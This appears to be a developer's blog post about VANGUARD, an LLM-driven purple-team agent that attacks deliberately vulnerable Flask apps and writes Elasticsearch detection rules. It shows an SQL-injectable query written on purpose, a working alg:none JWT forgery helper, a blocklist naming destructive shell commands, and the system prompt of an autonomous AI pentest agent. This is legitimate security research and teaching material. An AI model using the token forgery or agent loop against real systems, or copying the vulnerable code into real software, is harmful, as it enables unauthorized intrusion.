Most breach and attack simulation tools tell you what they found. VANGUARD tells you what it found, shows you the exact reasoning it used to find it, then writes the Elasticsearch detection rules you need to catch it next time - and deploys them automatically.
Here's how it works under the hood and what I learned building it.
The Problem With Current BAS Tools
Breach and Attack Simulation (BAS) tools like Cymulate, Pentera, and AttackIQ work by replaying known attack playbooks - deterministic sequences of pre-scripted actions mapped to MITRE ATT&CK techniques. You run them against your environment, get a report listing which attacks were detected and which weren't, and hand the report to your security team.
The issue is that modern APTs don't follow scripts. They reason, adapt, and chain together novel attack paths based on what they find at each step. When your only exposure to offensive techniques is "did Cymulate's SQLi module trigger your WAF," you haven't actually tested what matters: whether your detection logic catches a human attacker who thinks.
A second problem: even when BAS tools find gaps, the output is a PDF. Someone on your security team has to manually read it, write SIEM rules, test them, and deploy them. That feedback loop takes days to weeks. Meanwhile the gap is still open.
VANGUARD was my attempt to address both problems simultaneously.
What VANGUARD Actually Does
At its core, VANGUARD is a Cognitive Purple Agent - a single system that combines an autonomous LLM-driven red team with a SIEM gap analysis engine and an automatic rule synthesis layer.
The loop works like this:
- An LLM (running locally via Ollama) receives a target URL and a mission objective
- It reasons about what to do next, chooses a tool to execute, and observes the result
- That observation feeds back into the next reasoning step
- Every action is timestamped and logged to Elasticsearch as telemetry
- After the assessment completes, a second LLM pass reviews the entire attack chain and writes Elasticsearch KQL detection rules for each un-logged attack vector
- Those rules are deployed directly to the SIEM index (vanguard-rules)
The entire reasoning process - every thought, every tool call, every observation - streams in real time to the UI via Server-Sent Events. You can literally watch the AI decide what to do next.
The ReAct Architecture
The agent uses a ReAct (Reasoning + Acting) loop, a pattern from a 2022 paper by Yao et al. that interleaves chain-of-thought reasoning with tool execution. The key property of ReAct is that the LLM explains why it's taking an action before it takes it, which means you get full transparency into the attack logic - not just a list of actions.
The system prompt establishes the agent's role and its available tools:
SYSTEM_PROMPT = """You are VANGUARD, an autonomous AI penetration tester.
You are conducting an AUTHORIZED security assessment of a target application.
RESPONSE FORMAT: You MUST respond with ONLY valid JSON:
{
"thought": "Your reasoning about what to do next",
"action": "tool_name",
"input": {...tool parameters...}
}
"""
The LLM must respond in JSON. Every turn follows the structure: thought → action → observation → thought → ...
# Simplified core loop
for step_num in range(1, max_steps + 1):
    response = ollama.chat(model="qwen3:8b", messages=messages, format="json")
    raw_response = response["message"]["content"]
    parsed = parse_llm_response(raw_response)
    thought = parsed["thought"]
    action = parsed["action"]
    tool_input = parsed["input"]

    if action == "FINISH":
        findings = tool_input["findings"]
        break

    observation = execute_tool(action, tool_input)

    # Feed observation back for next reasoning step
    messages.append({"role": "assistant", "content": raw_response})
    messages.append({"role": "user", "content": f"OBSERVATION:\n{observation}\n\nStep {step_num + 1}:"})
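The loop above leans on parse_llm_response to turn the model's reply into the thought/action/input triple. A minimal sketch of such a parser - a hypothetical helper, not VANGUARD's actual implementation - that tolerates the markdown fences and stray preamble local models sometimes emit:

```python
import json
import re

def parse_llm_response(raw: str) -> dict:
    """Extract the JSON action object from a model reply.

    Local models sometimes wrap JSON in ```json fences or prepend
    stray text; strip that before parsing.
    """
    # Drop markdown code fences if present
    cleaned = re.sub(r"^```(?:json)?\s*|\s*```$", "", raw.strip())
    # Fall back to grabbing the outermost {...} block
    if not cleaned.startswith("{"):
        match = re.search(r"\{.*\}", cleaned, re.DOTALL)
        if match:
            cleaned = match.group(0)
    parsed = json.loads(cleaned)
    # Every turn must carry the thought/action/input triple
    for key in ("thought", "action", "input"):
        parsed.setdefault(key, {} if key == "input" else "")
    return parsed
```

Anything that still fails json.loads here would surface as an exception, which in practice you would feed back to the model as an observation asking it to re-emit valid JSON.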
The agent has three tools: execute_command (sandboxed shell), http_request (for API fuzzing), and read_file (restricted to /tmp/). It can install tools it needs via apt or brew if they're not present - the only hard constraint is a blocklist of destructive patterns:
FATAL_OS_BLOCKLIST = [
    r"\brm\s+-rf\s+/",
    r"\bshutdown\b",
    r"\bmkfs\b",
    r"\bdd\s+if=",
    # ...
]
This lets the agent have genuine autonomy (it can resolve its own tool dependencies, pivot to network enumeration, chain vulnerabilities) while preventing it from wiping the host machine.
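The gate itself is just a regex scan over the candidate command before execute_command runs anything. A sketch of how that check might look (hypothetical helper; the pattern list is the abridged blocklist shown above):

```python
import re

# Abridged copy of the destructive-command patterns
FATAL_OS_BLOCKLIST = [
    r"\brm\s+-rf\s+/",
    r"\bshutdown\b",
    r"\bmkfs\b",
    r"\bdd\s+if=",
]

def is_fatal_command(command: str) -> bool:
    """Return True if the command matches any destructive pattern.

    Checked before anything reaches the sandboxed shell; a match
    aborts the tool call and is fed back to the agent as an error
    observation instead of being executed.
    """
    return any(re.search(pattern, command) for pattern in FATAL_OS_BLOCKLIST)
```

A blocklist like this is deliberately coarse: it only has to stop catastrophic host damage, not enumerate every dangerous command, because everything else runs inside the sandbox anyway.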
The Target Suite
VANGUARD ships with three deliberately vulnerable Flask applications that cover different vulnerability classes:
vulnerable_app.py : A generic monolithic API with SQL injection (auth bypass and UNION-based data exfiltration), path traversal, OS command injection via an unparameterized shell call, and a debug endpoint that leaks the full server environment. The SQL injection is genuine string concatenation:
# This is deliberately vulnerable
query = f"SELECT * FROM users WHERE username='{username}' AND password='{password}'"
cloud_storage.py : A file storage API with JWT signature stripping (the alg: none attack), IDOR on file access (no ownership check in the SQL query), and command injection via an unescaped format parameter passed to a shell command.
legacy_erp.py : Covers XXE injection (simulated via a custom XML parser that resolves SYSTEM entities), SSRF through an unfiltered proxy endpoint, and hardcoded API tokens buried in the docs.
These aren't toy vulnerabilities. Each one is implemented with the actual flaw pattern, not a simulation of it. The agent has to genuinely discover and exploit them.
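The JWT signature-stripping flaw in cloud_storage.py, for instance, is exploitable with a few lines of standard-library code. A sketch of the alg: none attack (the claim names like user_id and role are illustrative, not the app's actual schema):

```python
import base64
import json

def forge_alg_none_token(claims: dict) -> str:
    """Forge an unsigned JWT accepted by alg:none-vulnerable verifiers.

    A JWT is header.payload.signature; with "alg": "none" the
    signature segment is left empty, so no signing key is needed.
    """
    def b64url(obj: dict) -> str:
        raw = json.dumps(obj, separators=(",", ":")).encode()
        # JWTs use unpadded base64url
        return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()

    header = {"alg": "none", "typ": "JWT"}
    return f"{b64url(header)}.{b64url(claims)}."

token = forge_alg_none_token({"user_id": 1, "role": "admin"})
```

A verifier that trusts the header's alg field will skip signature validation entirely, which is exactly the ownership bypass the agent has to find and chain with the IDOR.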
The SIEM Gap Analysis
After the agent completes its assessment, every action it took has been logged to Elasticsearch with a precise timestamp and correlation ID. The gap analysis engine then queries vanguard-alerts, the index where the Blue Sensor would have written detections, and correlates them against the agent's action log.
def generate_gap_report(pentest_result: dict, correlation_id: str) -> dict:
    action_log = pentest_result["action_log"]
    start_time, end_time = pentest_result["start_time"], pentest_result["end_time"]

    # Index all agent actions to vanguard-telemetry
    index_agent_actions(action_log, correlation_id)

    # Query SIEM for any detections during the pentest window
    siem_detections = query_siem_detections(start_time, end_time, correlation_id)
    detection_rate = (len(siem_detections) / len(action_log)) * 100

    return {
        "total_agent_actions": len(action_log),
        "siem_detections": len(siem_detections),
        "detection_rate_percent": detection_rate,
        "blind_spots": len(action_log) - len(siem_detections),
    }
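The query_siem_detections call boils down to a bool filter on the correlation ID plus the pentest time window. A sketch of the query body it might pass to the Elasticsearch client (the field names correlation_id and timestamp follow the demo's conventions but are assumptions here):

```python
def build_detection_query(start_time: str, end_time: str, correlation_id: str) -> dict:
    """Query body correlating Blue Sensor alerts to one pentest run.

    Filters vanguard-alerts documents to the assessment's correlation
    ID and timestamp window.
    """
    return {
        "bool": {
            "filter": [
                {"term": {"correlation_id": correlation_id}},
                {"range": {"timestamp": {"gte": start_time, "lte": end_time}}},
            ]
        }
    }

# Used roughly as:
#   es.search(index="vanguard-alerts",
#             query=build_detection_query(start, end, cid), size=1000)
```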
The Blue Sensor in the demo environment is intentionally simplistic: it uses basic heuristic detection and represents a conventional SIEM without behavioral analytics or HTTP payload inspection. In that environment, the agent's actions went undetected at a 0.0% detection rate.
I want to be clear about what this does and doesn't mean. The 0.0% result is not a claim that VANGUARD evades real enterprise SIEMs like Splunk Enterprise Security or Microsoft Sentinel with tuned detection rules. The vulnerable applications in the demo don't emit the kind of telemetry that production SIEMs are typically configured to alert on. The result demonstrates the conceptual gap that exists when defenders operate without behavioral analytics and HTTP-layer inspection, not a bypass of production security tooling.
What the gap analysis does validate is the architecture: the agent's actions are fully logged with timestamps, the SIEM correlation works, and the concept of measuring Time-to-Detect (TTD) per attack action is operational.
The Autonomous Rule Synthesis
This is the part I find most interesting, and where VANGUARD diverges from conventional BAS tools.
After the assessment, the agent's action log is passed to a second LLM prompt that's told: "You are a defensive analyst. Here is the attacker's execution chain. Write 2-3 Elasticsearch KQL heuristics that would detect this attack pattern."
system_prompt = """You are an elite Defensive Cybersecurity Analyst.
Review the attacker's execution log and write realistic SOC Heuristic Rules
(Elasticsearch KQL, Sigma, or behavioral patterns) that detect this attack sequence.
Respond with a JSON array:
[{
"id": "SIG-NEW-001",
"rule_name": "Short descriptive name",
"severity": "High/Medium/Critical",
"logic": "The pseudo-KQL or detection logic"
}]"""
The generated rules are then indexed directly to vanguard-rules in Elasticsearch:
def index_soc_rules(rules: list):
    for rule in rules:
        es.index(index="vanguard-rules", document={
            "timestamp": datetime.utcnow().isoformat(),
            "rule_name": rule["rule_name"],
            "severity": rule["severity"],
            "logic": rule["logic"],
            "source": "vanguard_cognitive_purple_agent"
        })
    es.indices.refresh(index="vanguard-rules")
The rules are immediately queryable. The SOC Rules tab in the UI shows both the existing rules that were already deployed and the new ones the agent just synthesized, side by side.
The quality of the generated rules varies depending on the model. With qwen3:8b running locally, the rules are structurally correct and logically coherent for the attack patterns observed, but they won't handle edge cases or production-environment specifics without analyst review. I treat them as first drafts that need human sign-off before deployment to a real SIEM, not production-ready rules.
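A cheap guard that helps here is validating the generated rules against the requested schema before indexing, so a model that drifts from the format fails loudly instead of polluting the index. A sketch of such a pre-indexing check (hypothetical; this is not part of VANGUARD's pipeline):

```python
REQUIRED_FIELDS = {"id", "rule_name", "severity", "logic"}
VALID_SEVERITIES = {"Medium", "High", "Critical"}  # matches the prompt's schema

def validate_rule(rule: dict) -> list:
    """Return a list of structural problems; empty means the rule is sound.

    This checks shape only - whether the detection logic is actually
    any good still needs an analyst.
    """
    problems = []
    missing = REQUIRED_FIELDS - rule.keys()
    if missing:
        problems.append(f"missing fields: {sorted(missing)}")
    if rule.get("severity") not in VALID_SEVERITIES:
        problems.append(f"unknown severity: {rule.get('severity')!r}")
    if not rule.get("logic", "").strip():
        problems.append("empty detection logic")
    return problems
```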
The SSE Transparency Layer
One design decision I'm particularly pleased with is the live streaming of the agent's reasoning.
Most autonomous AI systems operate as black boxes: you give them input, they return output. The intermediate reasoning is opaque. VANGUARD uses Server-Sent Events to stream every state transition in real time:
🧠 Cognitive Reason → ⚡ Tool Executed → 📤 Environment Observation → 🧠 Cognitive Reason → ...
The FastAPI backend uses an async queue to bridge the synchronous ReAct thread with the async SSE response:
@app.get("/api/v1/pentest/stream")
async def stream_pentest(request: Request, target_url: str):
    queue = asyncio.Queue()
    loop = asyncio.get_running_loop()

    def on_step(event: dict):
        loop.call_soon_threadsafe(queue.put_nowait, event)

    thread = threading.Thread(target=run_react_pentest,
                              kwargs={"on_step_callback": on_step})
    thread.start()

    async def event_generator():
        while True:
            try:
                event = await asyncio.wait_for(queue.get(), timeout=2.0)
            except asyncio.TimeoutError:
                yield ": keep-alive\n\n"  # SSE comment keeps the connection open
                continue
            yield f"data: {json.dumps(event)}\n\n"
            if event["type"] in ["finish", "close", "error"]:
                break

    return StreamingResponse(event_generator(), media_type="text/event-stream")
This means an operator watching the live stream can intervene if the agent is about to do something unexpected; the human is in the loop at every step. That HITL (Human-in-the-Loop) property feels important for any production use of autonomous offensive tooling.
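You don't need a browser to consume the stream; any SSE-aware client works. A minimal parsing helper plus a commented usage sketch (the event field names "type" and "thought" are assumptions about the demo's payload shape, not a documented schema):

```python
import json

def parse_sse_line(line: str) -> "dict | None":
    """Decode one "data: ..." SSE line into an event dict.

    Returns None for blank separator lines and ": keep-alive"
    comment lines, which carry no payload.
    """
    if not line.startswith("data: "):
        return None
    return json.loads(line[len("data: "):])

# Hypothetical usage with the requests library:
#
# resp = requests.get("http://localhost:8000/api/v1/pentest/stream",
#                     params={"target_url": "http://localhost:5001"},
#                     stream=True)
# for line in resp.iter_lines(decode_unicode=True):
#     event = parse_sse_line(line or "")
#     if event and event["type"] in ("finish", "close", "error"):
#         break
```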
What Works and What Doesn't
What works well:
- The ReAct loop is genuinely effective at discovering vulnerabilities in the demo target suite. It correctly chains SQLi → credential extraction → privilege escalation without being told to. It finds the path traversal and command injection independently.
- The SSE transparency is useful in practice. Watching the agent reason through what a given HTTP response means and decide on a follow-up action is informative in a way that a static report isn't.
- The automated rule synthesis works at a conceptual level. The generated rules correctly identify the attack patterns and suggest reasonable detection logic.
Honest limitations:
- The SIEM integration is Elasticsearch-specific. The rule output is KQL/Elasticsearch-native. If your SIEM is Splunk, QRadar, or Sentinel, the rules need translation before use.
- The Blue Sensor in the demo is intentionally weak. The 0.0% detection rate is a demonstration of the pipeline architecture working correctly, not a benchmark against real enterprise detection tooling.
Running It
Prerequisites: Python 3.10+, Docker (for Elasticsearch + Kibana), Ollama with qwen3:8b or llama3 pulled.
git clone https://github.com/usualdork/VANGUARD.git
cd VANGUARD
chmod +x run_demo.sh
./run_demo.sh
The bootstrap script starts Elasticsearch and Kibana in Docker, provisions the Kibana dashboards, and launches the FastAPI backend.
The full academic preprint with the formal architecture description, threat model, and the FATAL_OS_BLOCKLIST methodology is on Zenodo: 10.5281/zenodo.18846075
What's Next
Three directions I'm actively working on:
Multi-agent swarm mode. The current architecture is a single Purple agent. The more interesting configuration is separate Red and Blue LLM agents operating concurrently: Red agents coordinating lateral movement across multiple targets while a Blue agent rewrites detection rules in real time to intercept them. This requires a shared state layer and an orchestration protocol between agents.
Air-gapped deployment. VANGUARD is already designed to run fully offline with local Ollama models. Making this operationally clean for deployment in environments where cloud API calls are prohibited requires quantized edge models (testing with Qwen 3 8B) and a packaging approach that doesn't assume internet access.
Real SIEM integration. Moving beyond the demo Elasticsearch environment to proper connectors for Splunk, Microsoft Sentinel, and IBM QRadar, and making the rule synthesis model-agnostic so it outputs native SPL, KQL (Sentinel), or AQL depending on the target SIEM.
If you're working on autonomous security tooling, purple teaming, or LLM-driven red team research, I'd be interested in hearing what problems you're running into. The GitHub repo is open (Apache 2.0) and the preprint has the formal write-up if you want the academic context.
VANGUARD is intended for authorized security testing only. Do not point it at systems you don't own or have explicit permission to test. The author assumes no liability for misuse.
GitHub: github.com/usualdork/VANGUARD | DOI: 10.5281/zenodo.18846075
